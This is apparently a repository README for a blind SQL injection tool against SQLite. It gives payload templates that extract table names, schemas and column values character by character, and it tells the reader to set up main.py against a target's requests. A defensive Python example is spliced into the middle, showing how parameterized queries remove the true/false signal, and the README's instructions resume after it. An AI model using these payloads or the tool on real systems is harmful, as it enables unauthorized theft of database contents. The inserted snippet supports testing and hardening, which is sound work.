This is a repository about blind SQL injection for SQLite databases.
aykutcanustun/SQLiteBLINDInjection
SQLiteBLINDInjection
Author: aykutcanustun
To retrieve table names from database:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),{},1)){} {} --
To retrieve table schema:
' or UNICODE(SUBSTR((SELECT sql FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --
To retrieve values inside column:
' or UNICODE(SUBSTR((SELECT $COLUMN_NAME FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --
Replace $TABLE_NAME and $COLUMN_NAME with the data that you retrieved from the previous query!
To use the script, you have to set variables according to your request's header, data, response, etc.
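Why the comparison in these templates works as a yes/no signal, and how bound parameters remove it, as an added example that is not part of this repository's main.py. The `users` table, its columns and all function names are constructed for illustration.

```python
import sqlite3

# First template from this README with position 1, operator "<" and value 128 filled in.
PROBE_TRUE = ("' or UNICODE(SUBSTR((SELECT name FROM sqlite_master "
              "WHERE type='table'),1,1)) < 128 --")
# Same string with the comparison flipped, so the injected condition is false.
PROBE_FALSE = PROBE_TRUE.replace("< 128", "> 128")


def make_db():
    """Constructed in-memory database standing in for the application's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, note TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'hello')")
    return db


def lookup_concatenated(db, username):
    # Vulnerable pattern: the input is pasted into the SQL text, so a quote
    # ends the string literal and the rest is parsed as SQL.
    sql = "SELECT note FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, username):
    # Hardened pattern: the input is bound as a value and never parsed as SQL.
    sql = "SELECT note FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


def leaks_boolean(lookup, db):
    # If the two inputs produce different results, the response depends on the
    # injected condition. That difference is what blind extraction relies on.
    return lookup(db, PROBE_TRUE) != lookup(db, PROBE_FALSE)


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", leaks_boolean(lookup_concatenated, db))
    print("parameterized query leaks:", leaks_boolean(lookup_parameterized, db))
```

A check like `leaks_boolean` can be kept as a regression test around any query helper that accepts user input.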
I marked these lines with comments in main.py!
Make changes at these lines:
Replace "username" string with your request's data as below:
You have to make this request manually to see what the response is:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),1,1)) < 128 --
And replace "Data Sent!" string according to your manual request's reply: